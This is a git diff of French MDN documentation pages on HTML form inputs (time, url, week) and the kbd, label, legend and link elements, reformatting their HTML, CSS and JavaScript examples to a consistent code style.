+      pattern="[a-z]{4,8}" />
     <span class="validity"></span>
     <p>Un nom d'utilisateur doit être en minuscules sur 4 à 8 caractères.</p>
   </div>
@@ -380,15 +397,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```

--- a/files/fr/web/html/element/input/time/index.md
+++ b/files/fr/web/html/element/input/time/index.md
@@ -82,7 +82,7 @@ Il est possible de définir une valeur par défaut en indiquant une heure dans l
 
 ```html
 <label for="appt-time">Veuillez choisir une heure de rendez-vous :</label>
-<input id="appt-time" type="time" name="appt-time" value="13:30">
+<input id="appt-time" type="time" name="appt-time" value="13:30" />
 ```
 
 {{EmbedLiveSample('', 600, 60)}}
@@ -93,7 +93,7 @@ Il est également possible d'obtenir et de fixer l'heure en JavaScript grâce à
 
 ```js
 let timeControl = document.querySelector('input[type="time"]');
-timeControl.value = '15:30';
+timeControl.value = "15:30";
 ```
 
 ### Représentation de la valeur
@@ -109,10 +109,11 @@ Pour commencer, on a ce fragment de HTML qui utilise un libellé et le champ de 
 ```html
 <form>
   <label for="startTime">Début : </label>
-  <input type="time" id="startTime">
+  <input type="time" id="startTime" />
   <p>
     Valeur stockée dans <code>&lt;input time&gt;</code> :<code>
-            "<span id="value">n/a</span>"</code>.
+      "<span id="value">n/a</span>"</code
+    >.
   </p>
 </form>
 ```
@@ -125,9 +126,13 @@ On utilise quelques lignes de JavaScript afin de récupérer la valeur stockée 
 let startTime = document.getElementById("startTime");
 let valueSpan = document.getElementById("value");
 
-startTime.addEventListener("input", function() {
-  valueSpan.innerText = startTime.value;
-}, false);
+startTime.addEventListener(
+  "input",
+  function () {
+    valueSpan.innerText = startTime.value;
+  },
+  false,
+);
 ```
 
 #### Résultat
@@ -181,7 +186,7 @@ Dans sa forme la plus simple, `<input type="time">` n'est accompagné que d'un �
 ```html
 <form>
   <label for="appt-time">Veuillez choisir une heure de rendez-vous : </label>
-  <input id="appt-time" type="time" name="appt-time">
+  <input id="appt-time" type="time" name="appt-time" />
 </form>
 ```
 
@@ -202,7 +207,7 @@ La valeur de cet attribut est un entier exprimant le nombre de secondes à incr�
 ```html
 <form>
   <label for="appt-time">Veuillez choisir une heure de rendez-vous : </label>
-  <input id="appt-time" type="time" name="appt-time" step="2">
+  <input id="appt-time" type="time" name="appt-time" step="2" />
 </form>
 ```
 
@@ -226,9 +231,11 @@ Les attributs [`min`](/fr/docs/Web/HTML/Element/Input#attr-min) et [`max`](/fr/d
 
 ```html
 <form>
-  <label for="appt-time">Veuillez choisir une heure de rendez-vous (heures d'ouverture 12:00 à 18:00) : </label>
-  <input id="appt-time" type="time" name="appt-time"
-         min="12:00" max="18:00">
+  <label for="appt-time"
+    >Veuillez choisir une heure de rendez-vous (heures d'ouverture 12:00 à
+    18:00) :
+  </label>
+  <input id="appt-time" type="time" name="appt-time" min="12:00" max="18:00" />
   <span class="validity"></span>
 </form>
 ```
@@ -251,15 +258,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -274,13 +281,13 @@ Avec ce fragment de code HTML&nbsp;:
 En définissant un attribut [`min`](/fr/docs/Web/HTML/Element/Input#attr-min) supérieur à [`max`](/fr/docs/Web/HTML/Element/Input#attr-max), l'intervalle de temps valide se situera autour de minuit. Cette fonctionnalité n'est pas valable pour les autres champs de formulaire. Et bien [qu'elle fasse partie de la spécification HTML](https://html.spec.whatwg.org/C/#has-a-reversed-range), elle n'est pas prise en charge de façon universelle. La prise en charge pour les navigateurs basés sur Chrome a démarré à la version 82, Firefox l'a ajouté à la version 76 et Safari ne l'implémente pas (au moins jusqu'à la version 14.1). Pour déterminer la prise en charge, vous pouvez utiliser le fragment de code suivant&nbsp;:
 
 ```js
-const input = document.createElement('input');
-input.type = 'time';
-input.min = '23:00';
-input.max = '01:00';
-input.value = '23:59';
+const input = document.createElement("input");
+input.type = "time";
+input.min = "23:00";
+input.max = "01:00";
+input.value = "23:59";
 
-if (input.validity.valid && input.type === 'time') {
+if (input.validity.valid && input.type === "time") {
   // l'intervalle encadrant minuit est pris en charge
 } else {
   // l'intervalle encadrant minuit n'est pas pris en charge
@@ -296,13 +303,21 @@ Prenons l'exemple suivant qui restreint la plage horaire sélectionnable et qui 
 ```html
 <form>
   <div>
-    <label for="appt-time">Veuillez choisir une heure de rendez-vous (heures d'ouverture entre 12:00 et 18:00) : </label>
-    <input id="appt-time" type="time" name="appt-time"
-           min="12:00" max="18:00" required>
+    <label for="appt-time"
+      >Veuillez choisir une heure de rendez-vous (heures d'ouverture entre 12:00
+      et 18:00) :
+    </label>
+    <input
+      id="appt-time"
+      type="time"
+      name="appt-time"
+      min="12:00"
+      max="18:00"
+      required />
     <span class="validity"></span>
   </div>
   <div>
-      <input type="submit" value="Envoyer le formulaire">
+    <input type="submit" value="Envoyer le formulaire" />
   </div>
 </form>
 ```
@@ -336,14 +351,22 @@ Une façon de contourner ce problème consiste à utiliser l'attribut [`pattern`
 ```html
 <form>
   <div>
-    <label for="appt-time">Veuillez choisir une heure de rendez-vous (heures d'ouverture entre 12:00 et 18:00) : </label>
-    <input id="appt-time" type="time" name="appt-time"
-           min="12:00" max="18:00" required
-           pattern="[0-9]{2}:[0-9]{2}">
+    <label for="appt-time"
+      >Veuillez choisir une heure de rendez-vous (heures d'ouverture entre 12:00
+      et 18:00) :
+    </label>
+    <input
+      id="appt-time"
+      type="time"
+      name="appt-time"
+      min="12:00"
+      max="18:00"
+      required
+      pattern="[0-9]{2}:[0-9]{2}" />
     <span class="validity"></span>
   </div>
   <div>
-      <input type="submit" value="Envoyer">
+    <input type="submit" value="Envoyer" />
   </div>
 </form>
 ```
@@ -370,15 +393,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -396,23 +419,32 @@ Voici le fragment HTML utilisé&nbsp;:
 ```html
 <form>
   <div class="nativeTimePicker">
-    <label for="appt-time">Veuillez choisir une heure de rendez-vous (heures d'ouverture 12:00 à 18:00) : </label>
-      <input id="appt-time" type="time" name="appt-time"
-             min="12:00" max="18:00" required>
-      <span class="validity"></span>
-    </div>
-  <p class="fallbackLabel">Veuillez choisir une heure de rendez-vous (heures d'ouverture 12:00 à 18:00) : </p>
+    <label for="appt-time"
+      >Veuillez choisir une heure de rendez-vous (heures d'ouverture 12:00 à
+      18:00) :
+    </label>
+    <input
+      id="appt-time"
+      type="time"
+      name="appt-time"
+      min="12:00"
+      max="18:00"
+      required />
+    <span class="validity"></span>
+  </div>
+  <p class="fallbackLabel">
+    Veuillez choisir une heure de rendez-vous (heures d'ouverture 12:00 à 18:00)
+    :
+  </p>
   <div class="fallbackTimePicker">
     <div>
       <span>
         <label for="hour">Heures :</label>
-        <select id="hour" name="hour">
-        </select>
+        <select id="hour" name="hour"></select>
       </span>
       <span>
         <label for="minute">Minutes :</label>
-        <select id="minute" name="minute">
-        </select>
+        <select id="minute" name="minute"></select>
       </span>
     </div>
   </div>
@@ -435,15 +467,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -452,34 +484,34 @@ La partie la plus intéressante du code est celle qui permet de détecter si le 
 
 ```js
 // On définit quelques variables
-let nativePicker = document.querySelector('.nativeTimePicker');
-let fallbackPicker = document.querySelector('.fallbackTimePicker');
-let fallbackLabel = document.querySelector('.fallbackLabel');
+let nativePicker = document.querySelector(".nativeTimePicker");
+let fallbackPicker = document.querySelector(".fallbackTimePicker");
+let fallbackLabel = document.querySelector(".fallbackLabel");
 
-let hourSelect = document.querySelector('#hour');
-let minuteSelect = document.querySelector('#minute');
+let hourSelect = document.querySelector("#hour");
+let minuteSelect = document.querySelector("#minute");
 
 // On cache le sélecteur alternatif
-fallbackPicker.style.display = 'none';
-fallbackLabel.style.display = 'none';
+fallbackPicker.style.display = "none";
+fallbackLabel.style.display = "none";
 
 // On teste si un nouveau contrôle time
 // est transformé en text
-let test = document.createElement('input');
+let test = document.createElement("input");
 
 try {
-  test.type = 'time';
+  test.type = "time";
 } catch (e) {
   console.log(e.description);
 }
 
 // Si c'est le cas…
-if(test.type === 'text') {
+if (test.type === "text") {
   // On masque le sélecteur natif et
   // on affiche le sélecteur alternatif
-  nativePicker.style.display = 'none';
-  fallbackPicker.style.display = 'block';
-  fallbackLabel.style.display = 'block';
+  nativePicker.style.display = "none";
+  fallbackPicker.style.display = "block";
+  fallbackLabel.style.display = "block";
 
   // On génère les valeurs dynamiquement
   // pour les heures et les minutes
@@ -491,8 +523,8 @@ function populateHours() {
   // On ajoute les heures dans
   // l'élément <select> avec les 6
   // heures ouvertes
-  for(let i = 12; i <= 18; i++) {
-    let option = document.createElement('option');
+  for (let i = 12; i <= 18; i++) {
+    let option = document.createElement("option");
     option.textContent = i;
     hourSelect.appendChild(option);
   }
@@ -500,9 +532,9 @@ function populateHours() {
 
 function populateMinutes() {
   // On génère 60 options pour 60 minutes
-  for(let i = 0; i <= 59; i++) {
-    let option = document.createElement('option');
-    option.textContent = (i < 10) ? ("0" + i) : i;
+  for (let i = 0; i <= 59; i++) {
+    let option = document.createElement("option");
+    option.textContent = i < 10 ? "0" + i : i;
     minuteSelect.appendChild(option);
   }
 }
@@ -511,8 +543,8 @@ function populateMinutes() {
 // on s'assure que les minutes vaillent 00
 // afin de ne pas pouvoir choisir d'heure passé 18:00
 function setMinutesToZero() {
-  if(hourSelect.value === '18') {
-    minuteSelect.value = '00';
+  if (hourSelect.value === "18") {
+    minuteSelect.value = "00";
   }
 }
 

--- a/files/fr/web/html/element/input/url/index.md
+++ b/files/fr/web/html/element/input/url/index.md
@@ -147,7 +147,7 @@ Toutefois, ce mécanisme ne vérifie pas que l'URL saisie existe bien. Seule une
 Actuellement, l'ensemble des navigateurs implémentent ce type de champ comme un champ texte qui dispose de fonctionnalités de validation basiques. Dans sa forme la plus simple, un champ de saisie d'URL ressemblera à&nbsp;:
 
 ```html
-<input id="monURL" name="monURL" type="url">
+<input id="monURL" name="monURL" type="url" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -163,8 +163,11 @@ Il est parfois utile de fournir une indication sur le type de donnée attendu. S
 Dans l'exemple qui suit, le contrôle contient le texte indicatif `http://www.example.com`. Dans le résultat, vous pouvez voir comment ce texte disparaît/réapparaît lorsqu'on saisit une valeur dans le contrôle.
 
 ```html
-<input id="monURL" name="monURL" type="url"
-       placeholder="http://www.example.com">
+<input
+  id="monURL"
+  name="monURL"
+  type="url"
+  placeholder="http://www.example.com" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -178,8 +181,7 @@ Il est possible de contrôler la taille physique de la boîte utilisée pour le 
 C'est l'attribut [`size`](/fr/docs/Web/HTML/Element/Input#attr-size) qui permet de contrôler la taille de la boîte utilisée. La valeur de cet attribut correspond au nombre de caractères qui seront affichés en même temps dans la boîte. Dans l'exemple suivant, on souhaite que la boîte de saisie mesure 30 caractères de large&nbsp;:
 
 ```html
-<input id="monURL" name="monURL" type="url"
-       size="30">
+<input id="monURL" name="monURL" type="url" size="30" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -191,8 +193,13 @@ L'attribut `size` ne limite pas la valeur qui peut être saisie mais uniquement 
 Dans l'exemple qui suit, on affiche une boîte de saisie qui mesure 30 caractères de large et on souhaite que l'URL soit plus longue que 10 caractères et moins longue que 80.
 
 ```html
-<input id="monURL" name="monURL" type="url"
-       size="30" minlength="10" maxlength="80">
+<input
+  id="monURL"
+  name="monURL"
+  type="url"
+  size="30"
+  minlength="10"
+  maxlength="80" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -206,8 +213,7 @@ Dans l'exemple qui suit, on affiche une boîte de saisie qui mesure 30 caractèr
 On peut fournir une valeur par défaut grâce à l'attribut [`value`](/fr/docs/Web/HTML/Element/Input#attr-value)&nbsp;:
 
 ```html
-<input id="monURL" name="monURL" type="url"
-       value="http://www.example.com">
+<input id="monURL" name="monURL" type="url" value="http://www.example.com" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -217,15 +223,14 @@ On peut fournir une valeur par défaut grâce à l'attribut [`value`](/fr/docs/W
 On peut également fournir une liste d'options parmi lesquelles la personne saisissant une URL peut choisir via l'attribut [`list`](/fr/docs/Web/HTML/Element/Input#attr-list). Cette liste ne limite pas l'utilisatrice ou l'utilisateur à ces choix mais permet de choisir certaines URL fréquemment utilisées plus facilement. Cette liste peut également être utilisée par l'attribut [`autocomplete`](/fr/docs/Web/HTML/Element/Input#attr-autocomplete). La valeur de l'attribut `list` est un identifiant d'un élément [`<datalist>`](/fr/docs/Web/HTML/Element/datalist) qui contient autant d'éléments [`<option>`](/fr/docs/Web/HTML/Element/Option) que de valeurs suggérées. La valeur de l'attribut `value` de chacun de ces éléments `<option>` correspondra à la valeur qui sera suggérée dans le champ de saisie.
 
 ```html
-<input id="monURL" name="monURL" type="url"
-       list="defaultURLs">
+<input id="monURL" name="monURL" type="url" list="defaultURLs" />
 
 <datalist id="defaultURLs">
-  <option value="https://developer.mozilla.org/">
-  <option value="http://www.google.com/">
-  <option value="http://www.microsoft.com/">
-  <option value="https://www.mozilla.org/">
-  <option value="http://w3.org/">
+  <option value="https://developer.mozilla.org/"></option>
+  <option value="http://www.google.com/"></option>
+  <option value="http://www.microsoft.com/"></option>
+  <option value="https://www.mozilla.org/"></option>
+  <option value="http://w3.org/"></option>
 </datalist>
 ```
 
@@ -238,15 +243,14 @@ Avec cet élément [`<datalist>`](/fr/docs/Web/HTML/Element/datalist) et les él
 Il est aussi possible d'inclure des attributs [`label`](/fr/docs/Web/HTML/Element/Option#attr-label) sur un ou plusieurs des éléments `<option>` afin de fournir un libellé textuel. Certains navigateurs n'afficheront que les libellés tandis que d'autres afficheront le libellé et l'URL.
 
 ```html
-<input id="monURL" name="monURL" type="url"
-       list="defaultURLs">
+<input id="monURL" name="monURL" type="url" list="defaultURLs" />
 
 <datalist id="defaultURLs">
-  <option value="https://developer.mozilla.org/" label="MDN Web Docs">
-  <option value="http://www.google.com/" label="Google">
-  <option value="http://www.microsoft.com/" label="Microsoft">
-  <option value="https://www.mozilla.org/" label="Mozilla">
-  <option value="http://w3.org/" label="W3C">
+  <option value="https://developer.mozilla.org/" label="MDN Web Docs"></option>
+  <option value="http://www.google.com/" label="Google"></option>
+  <option value="http://www.microsoft.com/" label="Microsoft"></option>
+  <option value="https://www.mozilla.org/" label="Mozilla"></option>
+  <option value="http://w3.org/" label="W3C"></option>
 </datalist>
 ```
 
@@ -270,7 +274,7 @@ Comme vu ci-avant, on peut rendre la saisie de l'URL obligatoire avec l'attribut
 
 ```html
 <form>
-  <input id="monURL" name="monURL" type="url" required>
+  <input id="monURL" name="monURL" type="url" required />
   <button>Envoyer</button>
 </form>
 ```
@@ -301,14 +305,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
-  position: absolute; content: '✖';
+input:invalid + span:after {
+  position: absolute;
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -316,16 +321,21 @@ input:valid+span:after {
 ```html
 <form>
   <div>
-    <label for="myURL">Veuillez saisir l'adresse de la page problématique :</label>
-    <input id="myURL" name="myURL" type="url"
-           required pattern=".*\.maboite\..*"
-           title="L'URL doit être sur le domaine maboite.">
+    <label for="myURL"
+      >Veuillez saisir l'adresse de la page problématique :</label
+    >
+    <input
+      id="myURL"
+      name="myURL"
+      type="url"
+      required
+      pattern=".*\.maboite\..*"
+      title="L'URL doit être sur le domaine maboite." />
     <span class="validity"></span>
   </div>
   <div>
     <label for="myComment">Quel est le problème ?</label>
-    <input id="myComment" name="myComment" type="text"
-           required>
+    <input id="myComment" name="myComment" type="text" required />
     <span class="validity"></span>
   </div>
   <div>

--- a/files/fr/web/html/element/input/week/index.md
+++ b/files/fr/web/html/element/input/week/index.md
@@ -64,7 +64,7 @@ Il est possible de définir une valeur par défaut grâce à l'attribut [`value`
 
 ```html
 <label for="week">À quelle semaine souhaiteriez-vous démarrer ?</label>
-<input id="week" type="week" name="week" value="2017-W01">
+<input id="week" type="week" name="week" value="2017-W01" />
 ```
 
 {{EmbedLiveSample('', 600, 60)}}
@@ -75,7 +75,7 @@ Il est également possible d'accéder à la valeur ou de la définir en JavaScri
 
 ```js
 let weekControl = document.querySelector('input[type="week"]');
-weekControl.value = '2017-W45';
+weekControl.value = "2017-W45";
 ```
 
 ## Attributs supplémentaires
@@ -125,7 +125,7 @@ La forme la plus simple de `<input type="week">` se compose d'un élément `<inp
 ```html
 <form>
   <label for="week">À quelle semaine souhaiteriez-vous commencer ?</label>
-  <input id="week" type="week" name="week">
+  <input id="week" type="week" name="week" />
 </form>
 ```
 
@@ -150,8 +150,7 @@ Les attributs [`min`](/fr/docs/Web/HTML/Element/Input#attr-min) et [`max`](/fr/d
 ```html
 <form>
   <label for="week">À quelle semaine souhaiteriez-vous commencer ?</label>
-  <input id="week" type="week" name="week"
-         min="2017-W01" max="2017-W52">
+  <input id="week" type="week" name="week" min="2017-W01" max="2017-W52" />
   <span class="validity"></span>
 </form>
 ```
@@ -174,15 +173,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -199,12 +198,17 @@ Prenons un autre exemple (où la période a été restreinte comme précédemmen
 <form>
   <div>
     <label for="week">À quelle semaine souhaiteriez-vous commencer ?</label>
-    <input id="week" type="week" name="week"
-         min="2017-W01" max="2017-W52" required>
+    <input
+      id="week"
+      type="week"
+      name="week"
+      min="2017-W01"
+      max="2017-W52"
+      required />
     <span class="validity"></span>
   </div>
   <div>
-    <input type="submit" value="Envoyer le formulaire">
+    <input type="submit" value="Envoyer le formulaire" />
   </div>
 </form>
 ```
@@ -250,8 +254,13 @@ Voici le code HTML utilisé&nbsp;:
 <form>
   <div class="nativeWeekPicker">
     <label for="week">À quelle semaine souhaiteriez-vous commencer ?</label>
-    <input id="week" type="week" name="week"
-           min="2017-W01" max="2018-W52" required>
+    <input
+      id="week"
+      type="week"
+      name="week"
+      min="2017-W01"
+      max="2018-W52"
+      required />
     <span class="validity"></span>
   </div>
   <p class="fallbackLabel">À quelle semaine souhaiteriez-vous commencer ?</p>
@@ -259,8 +268,7 @@ Voici le code HTML utilisé&nbsp;:
     <div>
       <span>
         <label for="week">Semaine :</label>
-        <select id="fallbackWeek" name="week">
-        </select>
+        <select id="fallbackWeek" name="week"></select>
       </span>
       <span>
         <label for="year">Année :</label>
@@ -290,15 +298,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -307,29 +315,29 @@ Dans le fragment de code JavaScript qui suit, on montre comment détecter si la 
 
 ```js
 // On définit certaines variables
-let nativePicker = document.querySelector('.nativeWeekPicker');
-let fallbackPicker = document.querySelector('.fallbackWeekPicker');
-let fallbackLabel = document.querySelector('.fallbackLabel');
+let nativePicker = document.querySelector(".nativeWeekPicker");
+let fallbackPicker = document.querySelector(".fallbackWeekPicker");
+let fallbackLabel = document.querySelector(".fallbackLabel");
 
-let yearSelect = document.querySelector('#year');
-let weekSelect = document.querySelector('#fallbackWeek');
+let yearSelect = document.querySelector("#year");
+let weekSelect = document.querySelector("#fallbackWeek");
 
 // À l'état initial, on masque le sélecteur alternatif
-fallbackPicker.style.display = 'none';
-fallbackLabel.style.display = 'none';
+fallbackPicker.style.display = "none";
+fallbackLabel.style.display = "none";
 
 // On teste si le sélecteur natif se transforme en
 // contrôle de saisie de texte ou non
-let test = document.createElement('input');
-test.type = 'week';
+let test = document.createElement("input");
+test.type = "week";
 // Si c'est le cas, on exécute le code dans le bloc
 // conditionnel if() {}
-if(test.type === 'text') {
+if (test.type === "text") {
   // On masque alors le sélecteur natif et
   // on affiche le sélecteur alternatif
-  nativePicker.style.display = 'none';
-  fallbackPicker.style.display = 'block';
-  fallbackLabel.style.display = 'block';
+  nativePicker.style.display = "none";
+  fallbackPicker.style.display = "block";
+  fallbackLabel.style.display = "block";
 
   // On ajoute les semaines dynamiquement
   populateWeeks();
@@ -337,9 +345,9 @@ if(test.type === 'text') {
 
 function populateWeeks() {
   // On ajoute 52 semaines grâce à une boucle
-  for(let i = 1; i <= 52; i++) {
-    let option = document.createElement('option');
-    option.textContent = (i < 10) ? ("0" + i) : i;
+  for (let i = 1; i <= 52; i++) {
+    let option = document.createElement("option");
+    option.textContent = i < 10 ? "0" + i : i;
     weekSelect.appendChild(option);
   }
 }

--- a/files/fr/web/html/element/kbd/index.md
+++ b/files/fr/web/html/element/kbd/index.md
@@ -31,8 +31,10 @@ D'autres éléments peuvent être utilisés en association avec `<kbd>` afin de 
 ### Exemple simple
 
 ```html
-<p>Utilisez la commande <kbd>help macommande</kbd> afin de consulter
- la documentation pour la commande "macommande".</p>
+<p>
+  Utilisez la commande <kbd>help macommande</kbd> afin de consulter la
+  documentation pour la commande "macommande".
+</p>
 ```
 
 #### Résultat
@@ -51,9 +53,10 @@ Commençons par analyser le code HTML.
 
 ```html
 <p>
-  Vous pouvez également créer un nouveau document
-  en utilisant le raccourci clavier
-  <kbd><kbd>Ctrl</kbd>+<kbd>N</kbd></kbd>.
+  Vous pouvez également créer un nouveau document en utilisant le raccourci
+  clavier
+  <kbd><kbd>Ctrl</kbd>+<kbd>N</kbd></kbd
+  >.
 </p>
 ```
 
@@ -87,9 +90,10 @@ On met à jour le code HTML afin d'utiliser cette classe :
 
 ```html
 <p>
-  Vous pouvez également créer un nouveau document
-  en utilisant le raccourci clavier
-  <kbd><kbd class="key">Ctrl</kbd>+<kbd class="key">N</kbd></kbd>.
+  Vous pouvez également créer un nouveau document en utilisant le raccourci
+  clavier
+  <kbd><kbd class="key">Ctrl</kbd>+<kbd class="key">N</kbd></kbd
+  >.
 </p>
 ```
 
@@ -105,8 +109,8 @@ En imbriquant un élément `<kbd>` dans un élément {{HTMLElement("samp")}}, on
 
 ```html
 <p>
-  S'il se produit une erreur de syntaxe, cet outil affichera
-  la commande initialement saisie pour que vous la revoyez :
+  S'il se produit une erreur de syntaxe, cet outil affichera la commande
+  initialement saisie pour que vous la revoyez :
 </p>
 <blockquote>
   <samp><kbd>custom-git ad mon-nouveau-fichier.cpp</kbd></samp>
@@ -119,7 +123,7 @@ En imbriquant un élément `<kbd>` dans un élément {{HTMLElement("samp")}}, on
 
 ### Représenter les options de saisies à l'écran
 
-Imbriquer un élément `<samp>` dans un élément `<kbd>`  représente une saisie basée sur du texte affiché par le système (par exemple des noms de menu, d'éléments de menu, des noms de boutons affichés à l'écran, etc.).
+Imbriquer un élément `<samp>` dans un élément `<kbd>` représente une saisie basée sur du texte affiché par le système (par exemple des noms de menu, d'éléments de menu, des noms de boutons affichés à l'écran, etc.).
 
 #### HTML
 
@@ -128,14 +132,17 @@ Ainsi, si on souhaite expliquer comment choisir l'option "Nouveau document" dans
 ```html
 <p>
   Pour créer un nouveau fichier, sélectionner l'option
-  <kbd><kbd><samp>Fichier</samp></kbd>⇒<kbd><samp>Nouveau
-  document</samp></kbd></kbd> dans le menu.
+  <kbd
+    ><kbd><samp>Fichier</samp></kbd
+    >⇒<kbd><samp>Nouveau document</samp></kbd></kbd
+  >
+  dans le menu.
 </p>
 
 <p>
   N'oubliez pas de cliquer sur le bouton
-  <kbd><samp>OK</samp></kbd> afin de confirmer
-  que vous avez saisi le nom du nouveau fichier.
+  <kbd><samp>OK</samp></kbd> afin de confirmer que vous avez saisi le nom du
+  nouveau fichier.
 </p>
 ```
 

--- a/files/fr/web/html/element/label/index.md
+++ b/files/fr/web/html/element/label/index.md
@@ -20,8 +20,9 @@ Pour associer un élément `<label>` avec un élément `<input>`, il faut fourni
 On peut également créer un lien implicite en imbriquant l'élément `<input>` directement au sein d'un élément `<label>` . Dans ce cas, les attributs `for` et `id` ne sont plus nécessaires.
 
 ```html
-<label>Aimez-vous les petits pois ?
-  <input type="checkbox" name="petits_pois">
+<label
+  >Aimez-vous les petits pois ?
+  <input type="checkbox" name="petits_pois" />
 </label>
 ```
 
@@ -88,7 +89,7 @@ Il ne faut pas placer d'éléments interactifs (tels que les ancres ({{HTMLEleme
 
 ```html example-bad
 <label for="tac">
-  <input id="tac" type="checkbox" name="terms-and-conditions">
+  <input id="tac" type="checkbox" name="terms-and-conditions" />
   J'accepte <a href="terms-and-conditions.html">les conditions d'utilisation</a>
 </label>
 ```
@@ -97,7 +98,7 @@ Il ne faut pas placer d'éléments interactifs (tels que les ancres ({{HTMLEleme
 
 ```html example-good
 <label for="tac">
-  <input id="tac" type="checkbox" name="terms-and-conditions">
+  <input id="tac" type="checkbox" name="terms-and-conditions" />
   J'accepte les conditions d'utilisation
 </label>
 <p>
@@ -116,7 +117,7 @@ S'il faut associer un titre à un formulaire ou à une section d'un formulaire, 
 ```html example-bad
 <label for="votre-nom">
   <h3>Votre nom</h3>
-  <input id="votre-nom" name="votre-nom" type="text">
+  <input id="votre-nom" name="votre-nom" type="text" />
 </label>
 ```
 
@@ -125,7 +126,7 @@ S'il faut associer un titre à un formulaire ou à une section d'un formulaire, 
 ```html example-good
 <label class="label-grand" for="votre-nom">
   Votre nom
-  <input id="votre-nom" name="votre-nom" type="text">
+  <input id="votre-nom" name="votre-nom" type="text" />
 </label>
 ```
 

--- a/files/fr/web/html/element/legend/index.md
+++ b/files/fr/web/html/element/legend/index.md
@@ -22,7 +22,7 @@ Cet élément contient uniquement [les attributs universels](/fr/docs/Web/HTML/A
 <form action="" method="post">
   <fieldset>
     <legend>Un champ pour le choix de la radio</legend>
-    <input type="radio" name="radio" id="radio">
+    <input type="radio" name="radio" id="radio" />
     <label for="radio">Cliquez ici</label>
   </fieldset>
 </form>

--- a/files/fr/web/html/element/link/index.md
+++ b/files/fr/web/html/element/link/index.md
@@ -13,7 +13,7 @@ L'élément HTML **`<link>`** définit la relation entre le document courant et 
 Pour lier une feuille de style externe, on inclut un élément `<link>` de la forme suivante à l'intérieur de l'élément {{htmlelement("head")}} :
 
 ```html
-<link href="main.css" rel="stylesheet">
+<link href="main.css" rel="stylesheet" />
 ```
 
 Dans cet exemple, on indique le chemin vers la feuille de style grâce à l'attribut `href`, l'attribut `rel` possède une valeur `stylesheet` qui indique que c'est une feuille de style. `rel` signifie _relationship_ qui correspond donc à la relation entre la ressource et le document courant. Il existe de [nombreux types de liens possibles](/fr/docs/Web/HTML/Types_de_lien).
@@ -21,14 +21,17 @@ Dans cet exemple, on indique le chemin vers la feuille de style grâce à l'attr
 Certains types sont assez fréquents. Ainsi, pour l'icône présentant le site dans l'onglet, on trouvera :
 
 ```html
-<link rel="icon" href="favicon.ico">
+<link rel="icon" href="favicon.ico" />
 ```
 
 Il existe différents types de relations pour préciser les icônes et qui permettent notamment de cibler certaines plateformes mobiles :
 
 ```html
-<link rel="apple-touch-icon-precomposed" sizes="114x114"
-      href="apple-icon-114.png" type="image/png">
+<link
+  rel="apple-touch-icon-precomposed"
+  sizes="114x114"
+  href="apple-icon-114.png"
+  type="image/png" />
 ```
 
 L'attribut `sizes` indique la taille de l'icône tandis que l'attribut `type` contient le type MIME de la ressource qui est liée. Ces attributs permettent alors au navigateur de sélectionner la ressource la plus adéquate.
@@ -36,15 +39,22 @@ L'attribut `sizes` indique la taille de l'icône tandis que l'attribut `type` co
 On peut également fournir l'attribut `media` afin d'utiliser telle ou telle ressource lorsqu'une requête média est vérifiée. Ainsi, on pourra utiliser ce qui suit afin d'avoir une feuille de style utilisée à l'impression et une autre dédiée au mobile :
 
 ```html
-<link href="print.css" rel="stylesheet" media="print">
-<link href="mobile.css" rel="stylesheet" media="screen and (max-width: 600px)">
+<link href="print.css" rel="stylesheet" media="print" />
+<link
+  href="mobile.css"
+  rel="stylesheet"
+  media="screen and (max-width: 600px)" />
 ```
 
 Certaines fonctionnalités relatives à la sécurité sont également disponibles avec certains attributs de `<link>`. Dans cet exemple :
 
 ```html
-<link rel="preload" href="myFont.woff2" as="font"
-      type="font/woff2" crossorigin="anonymous">
+<link
+  rel="preload"
+  href="myFont.woff2"
+  as="font"
+  type="font/woff2"
+  crossorigin="anonymous" />
 ```
 
